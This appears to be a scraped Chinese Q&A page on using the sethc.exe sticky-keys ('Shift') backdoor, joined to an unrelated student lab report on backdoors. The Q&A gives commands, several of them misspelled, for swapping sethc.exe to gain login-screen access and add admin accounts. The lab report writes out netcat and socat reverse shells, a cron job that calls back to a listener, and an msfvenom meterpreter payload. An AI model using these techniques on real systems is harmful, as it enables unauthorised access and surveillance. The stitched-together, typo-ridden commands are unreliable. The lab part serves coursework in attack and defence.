shift后门怎么用

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了shift后门怎么用相关的知识,希望对你有一定的参考价值。

点击“开始”菜单-“运行”,输入命令“CMD”。回车后打开命令提示符窗口。在命令提示符窗口中,执行如下命令:
copy c:\wmdows\explorer.exe c:\windows\system32\sethc.exe
copy c:\wmdows\system32\sethc.exe c:\windows\system32\dUcache\sethc.exe
attrib c:\windows\system32\sethc.exe+h
atmb c:\wmdows\svstem32\dUcache\sethc.exe+h
这几句命令的作用,是将系统中的辅助工具“sethc.exe”。替换成为“explerer.exe”,这样就可以在3389或本地登录界面中打开粘滞键开关了。以后在3389远程连接窗口中,连续按下5次Shift键。即可自动打开资源管理器。点击工具栏“向上”按钮。返回到桌面,右键点击“我的电脑”。在弹出菜单中选择“管理”命令,打开管理工具,直接添加用户名即可。也可以打开控制面板中的用户帐户,添加管理员帐户。用同样的原理,也可将“sethc.exe”。替换成为“cmd.exe”,即可在CMDSHELL中执行帐户添加命令。
小提示
在windows 2000/xp/vista下,连续按shift键5次,可以运行“sethc,exe”打开粘滞键,而且在登录界面里也可以打开。采用替换“sethc.exe”的文件的方法,就可以实现运行任意

(望楼主采纳哦)
参考技术A shitf后门,其实就是使用了windows系统的粘滞键功能,当连按5次shift键的时候就会启动粘滞键程序。
然后有些后门程序会替换掉这个程序,然后通过按5次就来启动后门。

20154307 《网络对抗技术》实验二 后门原理与实践

20154307 《网络对抗技术》实验二 后门原理与实践#

一、基础问题回答##

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:下载盗版软件或者盗版电影的时候。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:linux的cron启动

(3)Meterpreter有哪些给你映像深刻的功能?

答:怎么说,摄屏这个太吊了,我以后要用胶布把这个摄像头堵住。

(4)如何发现自己有系统有没有被安装后门?

答:杀毒软件吧,直接就把后门的程序杀了。

二、实验内容##

1.使用netcat获取主机操作Shell,cron启动###

(1) Win获得Linux Shell

首先,我们用 ipconfig 查看win的ip地址

ncat监听本机(win)的4307端口

(kali端)用nc kali的ip 端口 -e /bin/sh反弹连接win

然后,在win端就能进行对linux的操作,例如,ls,或者是看ip地址,也为接下来的实验做铺垫

win端ip:192.168.120.132

kali端ip:192.168.120.129

(2) Linux获得Win Shell

(kali端)敲入nc -l -p 端口号打开监听

然后(win端)敲入c:\\your_nc_dir>ncat.exe -e cmd.exe linux的ip 端口号,对linux端进行反弹连接

(kali端)输入win的操作即可对win主机进行攻击

(3)使用nc传输数据

win下监听端口4307

(kali端)输入nc linux的ip 端口号,连接win的端口

效果如下:

2.使用socat获取主机操作Shell, 任务计划启动

在win下监听4307的端口

回到linux端,通过crontab -e,选3,进入vim编辑界面,进入插入模式,在最后一行敲入36 * * * * /bin/netcat 192.168.120.132 4307 -e /bin/sh,即在每个点的36分反弹连接win的4307端口,当时正好是34分,所以我输入了36,可以很快看到结果。修改后存盘退出

在win端输入linux的命令,一开始命令不会马上出来,到了你设置的时间点以后,命令和执行结果都会马上出来。

效果如下:

3.使用MSF meterpreter 生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

刚开始用socat时,这是啥?做完实验后,哇这个好叼

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr

设置完成后,锁定win用户(win+L),然后进入win,这时该触发器是运行的

在kali下输入socat - tcp:win的ip:端口号,发现获得了cmd.shell

4.使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

kali端输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口号 -f exe > 20154307_backdoor.exe,生成后门程序。(注意此时应该管理win的杀毒软件防火墙等)

在win端和linux端分别输入

Win7:ncat.exe -l > 20154307_backdoor.exe

kali:nc win的ip 端口号 < 20154307_backdoor.exe

在Kali上使用msfconsole指令进入控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

设置完成后,执行监听,打开win上的后门,linux上显示攻击成功

以下是攻击结果###

如此一来,课堂上讲完的实验就做完了

实验小结##

这次的实验非常有意思,让我也体验了一把当黑客的感觉,后们的攻击实在太厉害了,在学习后门攻击的同时我们也应该学会防范这些攻击,保护好个人隐私,同时,平时用不到的端口该关闭也要关闭,下载软件、电影、音乐的时候还是通过正规渠道比较好,不然黑客下一个攻击的就是你

以上是关于shift后门怎么用的主要内容,如果未能解决你的问题,请参考以下文章

什么是shift后门?

求一个shift后门bat文件代码,要自己实战过的

你忘记过VM密码吗?

如何检查网站源码是不是有后门

cs1.5前后门2打6怎么打?

如何查看一个PHP源码是不是有后门?